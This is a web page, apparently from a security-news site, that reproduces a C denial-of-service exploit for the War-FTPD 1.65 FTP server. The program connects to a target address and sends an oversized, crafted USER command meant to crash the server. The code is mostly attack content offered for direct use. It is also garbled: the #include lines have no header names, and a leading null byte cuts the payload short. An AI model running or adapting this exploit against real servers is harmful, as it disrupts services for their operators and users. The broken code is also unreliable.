Exploit/Advisories no image

Published on February 1st, 2024 📆 | 6295 Views ⚑

0

War-FTPD 1.65 Denial Of Service – Torchsec


https://www.ispeech.org

#include
#include
#include
#include
#include
#include

void intro();
void main_exploit(char *ip, int port);

int main(int argc, char *argv[]) {
if (argc != 3) {
printf("Usage: %s \n", argv[0]);
exit(EXIT_FAILURE);
}

intro();
main_exploit(argv[1], atoi(argv[2]));

return 0;
}

void intro() {
printf("\n"
"---------- # ------------------------------------------------------------------\n"
"--------- ##= ------- [+] War-FTPD 1.65 Username - Denied of Service (DoS) -----\n"
"-------- ##=== ----------------------------------------------------------------\n"
"------ ###==#=== --------------------------------------------------------------\n"
"---- ####===##==== ------------------------------------------------------------\n"
"-- #####====###===== ----- Coded by Fernando Mengali -----\n"
"- #####=====####===== ----- fernando.mengalli@gmail.com -----\n"
"- #####=====####===== --------------------------------------------------------\n"
"--- ####= # #==== -------- Prepare to exploiting the server ------------\n"
"--------- ##= ------------------------------------------------------------------\n"
"------- ####=== ---------------------------------------------------------------\n");
}

void main_exploit(char *ip, int port) {
char exploit[1000];
strcpy(exploit, "\x41\x41\x41\x41\x41\x41\x41\x41"); // Add more 'A's if needed
strcat(exploit, "\x00\x7e\x2b\x26\x3d\x25\x3a\x22\x0a\x0d\x20\x2f\x5c\x2e\r\n");

int sockfd;
struct sockaddr_in server_addr;

if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) < 0) {
perror("Socket creation error");
exit(EXIT_FAILURE);
}





server_addr.sin_family = AF_INET;
server_addr.sin_port = htons(port);

if (inet_pton(AF_INET, ip, &server_addr.sin_addr) <= 0) {
perror("Invalid address/ Address not supported");
exit(EXIT_FAILURE);
}

if (connect(sockfd, (struct sockaddr *)&server_addr, sizeof(server_addr)) < 0) {
perror("Connection Failed");
exit(EXIT_FAILURE);
}

char buffer[1024] = {0};
read(sockfd, buffer, sizeof(buffer));
printf("Connected => %s\n", buffer);

write(sockfd, "USER ", strlen("USER "));
write(sockfd, exploit, strlen(exploit));

read(sockfd, buffer, sizeof(buffer));
printf("Authentication USER: %s\n", buffer);

close(sockfd);
}

Source link

Tagged with:



Comments are closed.






© Torchsec  Privacy Policy Disclaimer  T&C



Back to Top ↑